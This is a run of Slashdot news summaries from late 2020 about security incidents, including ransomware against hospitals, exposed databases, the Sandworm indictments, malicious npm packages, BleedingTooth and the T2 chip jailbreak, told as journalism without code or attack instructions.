GitHub has denied rumors today of getting hacked after a mysterious entity shared what they claimed to be the source code of the GitHub.com and GitHub Enterprise portals. From a report: The "supposed" source code was leaked via a commit to GitHub's DMCA section. The commit was also faked to look like it originated from GitHub CEO Nat Friedman. But in a message posted on YCombinator's Hacker News portal, Friedman denied that it was him and that GitHub got hacked in any way. Friedman said the "leaked source code" didn't cover all of GitHub's code but only the GitHub Enterprise Server product. This is a version of GitHub Enterprise that companies can run on their own on-premise servers in case they need to store source code locally for security reasons but still want to benefit from GitHub Enterprise features. Friedman said this source code had already leaked months before due to its own error when GitHub engineers accidentally "shipped an un-stripped/obfuscated tarball of our GitHub Enterprise Server source code to some customers."

Read more of this story at Slashdot.

An anonymous reader quotes a report from ZDNet: GrowDiaries, an online community where marijuana growers can blog about their plants and interact with other farmers, has suffered a security breach in September this year. The breach occurred after the company left two Kibana apps exposed on the internet without administrative passwords. Kibana apps are normally used by a company's IT and development staff, as the app allows programmers to manage Elasticsearch databases via a simple web-based visual interface. Due to its native features, securing Kibana apps is just as important as securing the databases themselves. But in a report published today on LinkedIn, Bob Diachenko, a security researcher known for discovering and reporting unsecured databases, said GrowDiaries failed to secure two of its Kibana apps, which appear to have been left exposed online without a password since September 22, 2020. Diachenko says these two Kibana apps granted attackers access to two sets of Elasticsearch databases, with one storing 1.4 million user records and the second holding more than two million user data points. The first exposed usernames, email addresses, and IP addresses, while the second database also exposed user articles posted on the GrowDiaries site and users' account passwords. While the passwords were stored in a hashed format, Diachenko said the format was MD5, a hashing function known to be insecure and crackable (allowing threat actors to determine the cleartext version of each password). The company secured its infrastructure five days after Diachenko reported the exposed Kibana apps on October 10. It's unknown if someone else accessed the databases to download user data.

Read more of this story at Slashdot.

More than 23,000 hacked databases have been made available for download on several hacking forums and Telegram channels in what threat intel analysts are calling the biggest leak of its kind. From a report: The database collection is said to have originated from Cit0Day.in, a private service advertised on hacking forums to other cybercriminals. Cit0day operated by collecting hacked databases and then providing access to usernames, emails, addresses, and even cleartext passwords to other hackers for a daily or monthly fee. Cybercriminals would then use the site to identify possible passwords for targeted users and then attempt to breach their accounts at other, more high-profile sites. The idea behind the site isn't unique, and Cit0Day could be considered a reincarnation of similar "data breach index" services such as LeakedSource and WeLeakInfo, both taken down by authorities in 2018 and 2020, respectively.

Read more of this story at Slashdot.

Google Project Zero, the Google security team that finds bugs in all popular software, has disclosed what it classes a high-severity flaw on GitHub after the code-hosting site asked for a double extension on the normal 90-day disclosure deadline. From a report: The bug in GitHub's Actions feature -- a developer workflow automation tool -- has become one of the rare vulnerabilities that wasn't properly fixed before Google Project Zero's (GPZ) standard 90-day deadline expired. Over 95.8% of flaws are fixed within the deadline, according to Google's hackers. GPZ is known to be generally strict with its 90-day deadline, but it appears GitHub was a little lax in its responses as the deadline approached after Google gave it every chance to fix the bug. As detailed in a disclosure timeline by GPZ's Felix Wilhelm, the Google security team reported the issue to GitHub's security on July 21 and a disclosure date was set for October 18. According to Wilhelm, Actions' workflow commands are "highly vulnerable to injection attacks."

Read more of this story at Slashdot.

A shared user account used by WeWork employees to access printer settings and print jobs had an incredibly simple password -- so simple that a customer guessed it. From a report: Jake Elsley, who works at a WeWork in London, said he found the user account after a WeWork employee at his location mistakenly left the account logged in. WeWork customers like Elsley normally have an assigned seven-digit username and a four-digit passcode used for printing documents at WeWork locations. But the username for the account used by WeWork employees was just four-digits: "9999". Elsley told TechCrunch that he guessed the password because it was the same as the username. ("9999" is ranked as one of the most common passwords in use today, making it highly insecure.) The "9999" account is used by and shared among WeWork community managers, who oversee day-to-day operations at each location, to print documents for visitors who don't have accounts to print on their own. The account cannot be used to access print jobs sent to other customer accounts. Elsley said that the "9999" account could not see the contents of documents beyond file names, but that logging in to the WeWork printing web portal could allow him to release other people's pending print jobs sent to the "9999" account to any other WeWork printer on the network.

Read more of this story at Slashdot.

Hackers stole $2.3 million from the Wisconsin Republican Party's account that was being used to help reelect President Donald Trump in the key battleground state, the party's chairman told The Associated Press on Thursday. From a report: The party noticed the suspicious activity on Oct. 22 and contacted the FBI on Friday, said Republican Party Chairman Andrew Hitt. Hitt said the FBI is investigating. The attack was discovered less than two weeks before Election Day as both Trump and Democratic rival Joe Biden made their final push to win Wisconsin and its 10 electoral votes. Trump won the state by fewer than 23,000 votes in 2016 and planned his third visit in seven days on Friday. Biden also planned to campaign in Wisconsin on Friday. Polls have consistently shown a tight race in the state, usually with Biden ahead by single digits and within the margin of error.

Read more of this story at Slashdot.

Several federal agencies on Wednesday warned hospitals and cyber-researchers about "credible" information "of an increased and imminent cybercrime threat to U.S. hospitals and health-care providers." From a report: The FBI, the Department of Health and Human Services and the Cybersecurity and Infrastructure Security Agency, part of the Department of Homeland Security and known as CISA, said hackers were targeting the sector, "often leading to ransomware attacks, data theft and the disruption of health-care services," according to an advisory. The advisory warned that hackers might use Ryuk ransomware "for financial gain." The warning comes as Covid-19 cases and hospitalizations surge across the country. The cybersecurity company FireEye said multiple U.S hospitals had been hit by a "coordinated" ransomware attack, with at least three publicly confirming being struck this week. [...] The attack was carried out by a financially motivated cybercrime group dubbed UNC1878 by computer security researchers, according to Charles Carmakal, FireEye's strategic services chief technology officer. At least three hospitals were severely affected by ransomware on Tuesday, he said, and multiple hospitals have been hit over the past several weeks. UNC1878 intends to target and deploy ransomware to hundreds of other hospitals, Carmakal said.

Read more of this story at Slashdot.

Brian Krebs: In March 2020, KrebsOnSecurity alerted Swedish security giant Gunnebo Group that hackers had broken into its network and sold the access to a criminal group which specializes in deploying ransomware. In August, Gunnebo said it had successfully thwarted a ransomware attack, but this week it emerged that the intruders stole and published online tens of thousands of sensitive documents -- including schematics of client bank vaults and surveillance systems. The Gunnebo Group is a Swedish multinational company that provides physical security to a variety of customers globally, including banks, government agencies, airports, casinos, jewelry stores, tax agencies and even nuclear power plants. The company has operations in 25 countries, more than 4,000 employees, and billions in revenue annually. Acting on a tip from Milwaukee, Wis.-based cyber intelligence firm Hold Security, KrebsOnSecurity in March told Gunnebo about a financial transaction between a malicious hacker and a cybercriminal group which specializes in deploying ransomware. That transaction included credentials to a Remote Desktop Protocol (RDP) account apparently set up by a Gunnebo Group employee who wished to access the company's internal network remotely. Five months later, Gunnebo disclosed it had suffered a cyber attack targeting its IT systems that forced the shutdown of internal servers. Nevertheless, the company said its quick reaction prevented the intruders from spreading the ransomware throughout its systems, and that the overall lasting impact from the incident was minimal.

Read more of this story at Slashdot.

More than 100 smart irrigation systems were left exposed online without a password last month, allowing anyone to access and tamper with water irrigation programs for crops, tree plantations, cities, and building complexes. From a report: The exposed irrigation systems were discovered by Security Joes, a small boutique security firm based in Israel. All were running ICC PRO, a top-shelf smart irrigation system designed by Motorola for use with agricultural, turf, and landscape management. Security Joes co-founder Ido Naor told ZDNet last month that companies and city officials had installed ICC PRO systems without changing default factory settings, which don't include a password for the default account. Naor says the systems could be easily identified online with the help of IoT search engines like Shodan. Once attackers locate an internet-accessible ICC PRO system, Naor says all they have to do is type in the default admin username and press Enter to access a smart irrigation control panel. Here, Naor says attackers can pause or stop watering events, change settings, control the water quantity and pressure delivered to pumps, or lock irrigation systems by deleting users.

Read more of this story at Slashdot.

A Georgia county has reverted to matching some absentee ballot signatures to paper backups, rather than an online system, after a ransomware infection spread to part of its election department. From a report: Poll workers in Hall County have since caught up on a backlog of absentee ballots, state officials said, and said there's no danger of the ransomware extending to systems used to cast or count votes. But the infection is the first known example in the 2020 general election of opportunistic criminal hackers incidentally slowing the broader election process, something that federal cybersecurity officials have warned is a strong possibility. But the attack does not indicate any broad effort to tamper with U.S. voting or show systemic vulnerabilities to the U.S. election system. "They switched over to their paper backups, which is required of them," said Jordan Fuchs, Georgia's deputy secretary of state. "It took a little bit of work on their part -- I think they had 11 days of catch-up to do -- and they completed their task," she said.

Read more of this story at Slashdot.

After the U.S. unveiled charges against six members of the Sandworm unit in Russia's military intelligence agency, Wired re-visited "a secret experiment in 2007 proved that hackers could devastate power grid equipment beyond repair — with a file no bigger than a gif." It's an excerpt from the new book SANDWORM: A New Era of Cyberwar and the Hunt for the Kremlin's Most Dangerous Hackers which also remembers the late industrial control systems security pioneer Mike Assante: Among [Sandworm's] acts of cyberwar was an unprecedented attack on Ukraine's power grid in 2016, one that appeared designed to not merely cause a blackout, but to inflict physical damage on electric equipment. And when one cybersecurity researcher named Mike Assante dug into the details of that attack, he recognized a grid-hacking idea invented not by Russian hackers, but by the United State government, and tested a decade earlier... [S]creens showed live footage from several angles of a massive diesel generator. The machine was the size of a school bus, a mint green, gargantuan mass of steel weighing 27 tons, about as much as an M3 Bradley tank. It sat a mile away from its audience in an electrical substation, producing enough electricity to power a hospital or a navy ship and emitting a steady roar. Waves of heat coming off its surface rippled the horizon in the video feed's image. Assante and his fellow Idaho National Laboratory researchers had bought the generator for $300,000 from an oil field in Alaska. They'd shipped it thousands of miles to the Idaho test site, an 890-square-mile piece of land where the national lab maintained a sizable power grid for testing purposes, complete with 61 miles of transmission lines and seven electrical substations. Now, if Assante had done his job properly, they were going to destroy it. And the assembled researchers planned to kill that very expensive and resilient piece of machinery not with any physical tool or weapon but with about 140 kilobytes of data, a file smaller than the average cat GIF shared today on Twitter.... Protective relays are designed to function as a safety mechanism to guard against dangerous physical conditions in electric systems. If lines overheat or a generator goes out of sync, it's those protective relays that detect the anomaly and open a circuit breaker, disconnecting the trouble spot, saving precious hardware, even preventing fires... But what if that protective relay could be paralyzed — or worse, corrupted so that it became the vehicle for an attacker's payload...? Black chunks began to fly out of an access panel on the generator, which the researchers had left open to watch its internals. Inside, the black rubber grommet that linked the two halves of the generator's shaft was tearing itself apart. A few seconds later, the machine shook again as the protective relay code repeated its sabotage cycle, disconnecting the machine and reconnecting it out of sync. This time a cloud of gray smoke began to spill out of the generator, perhaps the result of the rubber debris burning inside it... The engineers had just proven without a doubt that hackers who attacked an electric utility could go beyond a temporary disruption of the victim's operations: They could damage its most critical equipment beyond repair... Assante also remembers feeling something weightier in the moments after the Aurora experiment. It was a sense that, like Robert Oppenheimer watching the first atomic bomb test at another U.S. national lab six decades earlier, he was witnessing the birth of something historic and immensely powerful. "I had a very real pit in my stomach," Assante says. "It was like a glimpse of the future."

Read more of this story at Slashdot.

A hacking group is donating stolen money to charity in what is seen as a mysterious first for cyber-crime that's puzzling experts. smooth wombat writes: Darkside hackers claim to have extorted millions of dollars from companies, but say they now want to "make the world a better place." In a post on the dark web, the gang posted receipts for $10,000 in Bitcoin donations to two charities. One of them, Children International, says it will not be keeping the money. The move is being seen as a strange and troubling development, both morally and legally. In the blog post on 13 October, the hackers claim they only target large profitable companies with their ransomware attacks. The attacks hold organisations' IT systems hostage until a ransom is paid. They wrote: "We think that it's fair that some of the money the companies have paid will go to charity. No matter how bad you think our work is, we are pleased to know that we helped changed someone's life. Today we sended (sic) the first donations." The cyber-criminals posted the donation along with tax receipts they received in exchange for the 0.88 Bitcoin they had sent to two charities, The Water Project and Children International.

Read more of this story at Slashdot.

Google's Nest Secure alarm system, which was discussed on Slashdot for featuring an unlisted, disabled microphone, has been discontinued by Google, though it will continue functioning. Android Police reports: Google released the Nest Guard in 2017 as a simple security system with motion sensors and a keypad, but it never received an upgrade, even as other Nest devices were updated again and again. The product page for the Nest Guard on the Google Store was updated last week with a 'No longer available' message, possibly indicating it had been discontinued. Google later confirmed to Android Police that the Nest Guard will no longer be sold, but it will continue to work for people who have already bought it.

Read more of this story at Slashdot.

The US Department of Justice has unsealed charges today against six Russian nationals believed to be part of one of Russia's most elite and secretive hacking groups, universally known as Sandworm. From a report: US officials said all six nationals are officers in Unit 74455 of the Russian Main Intelligence Directorate (GRU), a military intelligence agency of the Russian Army, DOJ officials said today. Under orders from the Russian government, US officials said the six (believed to be part of a much larger group) conducted cyber-attacks on behalf of the Russian government with the intent to destabilize other countries, interfere in their internal politics, and cause havoc and monetary losses. Their attacks span the last decade and include some of the biggest cyber-attacks known to date: Ukrainian Government & Critical Infrastructure (between December 2015 to December 2016), French Elections (April and May 2017), Worldwide Businesses and Critical Infrastructure (aka NotPetya; June 2017), PyeongChang Winter Olympics Hosts, Participants, Partners, and Attendees (December 2017 through February 2018), PyeongChang Winter Olympics IT Systems (aka Olympic Destroyer; 2017 through February 2018), Novichok Poisoning Investigations (April 2018), and Georgian Companies and Government Entities (a 2018 spearphishing campaign targeting a major media company, 2019 efforts to compromise the network of Parliament, and a wide-ranging website defacement campaign in 2019.)

Read more of this story at Slashdot.

"Three JavaScript packages have been removed from the npm portal on Thursday for containing malicious code," reports ZDNet. "According to advisories from the npm security team, the three JavaScript libraries opened shells on the computers of developers who imported the packages into their projects." The shells, a technical term used by cyber-security researchers, allowed threat actors to connect remotely to the infected computer and execute malicious operations. The npm security team said the shells could work on both Windows and *nix operating systems, such as Linux, FreeBSD, OpenBSD, and others. All three packages were uploaded on the npm portal in May (first) and September 2018 (last two). Each package had hundreds of downloads since being uploaded on the npm portal. The packages names were: plutov-slack-client nodetest199 nodetest1010 "Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer," the npm security team said.

Read more of this story at Slashdot.

nickwinlund77 quotes a New York Times opinion piece: In March, several cybercrime groups rushed to reassure people that they wouldn't target hospitals and other health care facilities during the Covid-19 pandemic. The operators of several prominent strains of ransomware all announced they would not target hospitals, and some of them even promised to decrypt the data of health care organizations for free if one was accidentally infected by their malware. But any cybersecurity strategy that relies on the moral compunctions of criminals is doomed to fail, particularly when it comes to protecting the notoriously vulnerable computer systems of hospitals. So it's no surprise that Universal Health Services was hit by ransomware late last month, affecting many of its more than 400 health care facilities across the United States and Britain. Or that clinical trials for a Covid-19 vaccine have been held up by a similar ransomware attack disclosed in early October. Or that loose-knit coalitions of volunteers all over the world are working around the clock to try to protect the computer systems of hospitals that are already straining under the demands of providing patient care during a global pandemic. In the midst of the Covid-19 pandemic, the potential consequences of these cyberattacks are terrifying. Hospitals that have lost access to their databases or had their networks infected by ransomware may not be able to admit patients in need of care or may take longer to provide those patients with the treatment they need, if they switch to relying on paper records... Every hospital and clinic should be re-evaluating their computer networks right now and ramping up the protections they have in place to prevent their services from being interrupted by malware or their sensitive patient data from being stolen.

Read more of this story at Slashdot.

A ransomware gang going by the of Egregor has leaked data it claims to have obtained from the internal networks of two of today's largest gaming companies -- Ubisoft and Crytek. An anonymous reader writes: Data allegedly taken from each company has been published on the ransomware gang's dark web portal on Tuesday. Details about how the Egregor gang obtained the data remain unclear. Ransomware gangs like Egregor regularly breach companies, steal their data, encrypt files, and ask for a ransom to decrypt the locked data. However, in many incidents, ransomware gangs are also get caught and kicked out of networks during the data exfiltration process, and files are never encrypted. Nevertheless, they still extort companies, asking victims for money to not leak sensitive files. Usually, when negotiations break down, ransomware gangs post a partial leak of the stolen files on so-called leak sites. On Tuesday, leaks for both Crytek and Ubisoft were posted on the Egregor portal at the same time, with threats from the ransomware crew to leak more files in the coming days.

Read more of this story at Slashdot.

An anonymous reader quotes a report from Ars Technica: Google and Intel are warning of a high-severity Bluetooth flaw in all but the most recent version of the Linux Kernel. While a Google researcher said the bug allows seamless code execution by attackers within Bluetooth range, Intel is characterizing the flaw as providing an escalation of privileges or the disclosure of information. The flaw resides in BlueZ, the software stack that by default implements all Bluetooth core protocols and layers for Linux. Besides Linux laptops, it's used in many consumer or industrial Internet-of-things devices. It works with Linux versions 2.4.6 and later. So far, little is known about BleedingTooth, the name given by Google engineer Andy Nguyen, who said that a blog post will be published "soon." A Twitter thread and a YouTube video provide the most detail and give the impression that the bug provides a reliable way for nearby attackers to execute malicious code of their choice on vulnerable Linux devices that use BlueZ for Bluetooth. Intel, meanwhile, has issued this bare-bones advisory that categorizes the flaw as privilege-escalation or information-disclosure vulnerability. The advisory assigned a severity score of 8.3 out of a possible 10 to CVE-2020-12351, one of three distinct bugs that comprise BleedingTooth. "Potential security vulnerabilities in BlueZ may allow escalation of privilege or information disclosure," the advisory states. "BlueZ is releasing Linux kernel fixes to address these potential vulnerabilities." Intel, which is a primary contributor to the BlueZ open source project, said that the most effective way to patch the vulnerabilities is to update to Linux kernel version 5.9, which was published on Sunday. Those who can't upgrade to version 5.9 can install a series of kernel patches the advisory links to. Maintainers of BlueZ didn't immediately respond to emails asking for additional details about this vulnerability. Ars Technica points out that since BleedingTooth requires proximity to a vulnerable device, there's not much reason for people to worry about this vulnerability. "It also requires highly specialized knowledge and works on only a tiny fraction of the world's Bluetooth devices," it adds.

Read more of this story at Slashdot.

The Xplora 4 smartwatch, made by Chinese outfit Qihoo 360 Technology Co, and marketed to children under the Xplora brand in the US and Europe, can covertly take photos and record audio when activated by an encrypted SMS message, says Norwegian security firm Mnemonic. The Register reports: This backdoor is not a bug, the finders insist, but a deliberate, hidden feature. Around 350,000 watches have been sold so far, Xplora says. Exploiting this security hole is non-trivial, we note, though it does reveal the kind of remotely accessible stuff left in the firmware of today's gizmos. "The backdoor itself is not a vulnerability," said infosec pros Harrison Sand and Erlend Leiknes in a report on Monday. "It is a feature set developed with intent, with function names that include remote snapshot, send location, and wiretap. The backdoor is activated by sending SMS commands to the watch." The researchers suggest these smartwatches could be used to capture photos covertly from its built-in camera, to track the wearer's location, and to conduct wiretapping via the built-in mic. They have not claimed any such surveillance has actually been done. The watches are marketed as a child's first phone, we're told, and thus contain a SIM card for connectivity (with an associated phone number). Parents can track the whereabouts of their offspring by using an app that finds the wearer of the watch. Xplora contends the security issue is just unused code from a prototype and has now been patched. But the company's smartwatches were among those cited by Mnemonic and Norwegian Consumer Council in 2017 for assorted security and privacy concerns. With the appropriate Android intent, an incoming encrypted SMS message received by the Qihoo SMS app could be directed through the command dispatcher in the Persistent Connection Service to trigger an application command, like a remote memory snapshot. Exploiting this backdoor requires knowing the phone number of the target device and its factory-set encryption key. This data is available to those to Qihoo and Xplora, according to the researchers, and can be pulled off the device physically using specialist tools. This basically means ordinary folks aren't going to be hacked, either by the manufacturer under orders from Beijing or opportunistic miscreants attacking gizmos in the wild, though it is an issue for persons of interest. It also highlights the kind of code left lingering in mass-market devices.

Read more of this story at Slashdot.

A recently released tool is letting anyone exploit an unusual Mac vulnerability to bypass Apple's trusted T2 security chip and gain deep system access. The flaw is one researchers have also been using for more than a year to jailbreak older models of iPhones. But the fact that the T2 chip is vulnerable in the same way creates a new host of potential threats. Worst of all, while Apple may be able to slow down potential hackers, the flaw is ultimately unfixable in every Mac that has a T2 inside. From a report: In general, the jailbreak community haven't paid as much attention to macOS and OS X as it has iOS, because they don't have the same restrictions and walled gardens that are built into Apple's mobile ecosystem. But the T2 chip, launched in 2017, created some limitations and mysteries. Apple added the chip as a trusted mechanism for securing high-value features like encrypted data storage, Touch ID, and Activation Lock, which works with Apple's "Find My" services. But the T2 also contains a vulnerability, known as Checkm8, that jailbreakers have already been exploiting in Apple's A5 through A11 (2011 to 2017) mobile chipsets. Now Checkra1n, the same group that developed the tool for iOS, has released support for T2 bypass. On Macs, the jailbreak allows researchers to probe the T2 chip and explore its security features. It can even be used to run Linux on the T2 or play Doom on a MacBook Pro's Touch Bar. The jailbreak could also be weaponized by malicious hackers, though, to disable macOS security features like System Integrity Protection and Secure Boot and install malware. Combined with another T2 vulnerability that was publicly disclosed in July by the Chinese security research and jailbreaking group Pangu Team, the jailbreak could also potentially be used to obtain FileVault encryption keys and to decrypt user data. The vulnerability is unpatchable, because the flaw is in low-level, unchangeable code for hardware. "The T2 is meant to be this little secure black box in Macs -- a computer inside your computer, handling things like Lost Mode enforcement, integrity checking, and other privileged duties," says Will Strafach, a longtime iOS researcher and creator of the Guardian Firewall app for iOS. "So the significance is that this chip was supposed to be harder to compromise -- but now it's been done."

Read more of this story at Slashdot.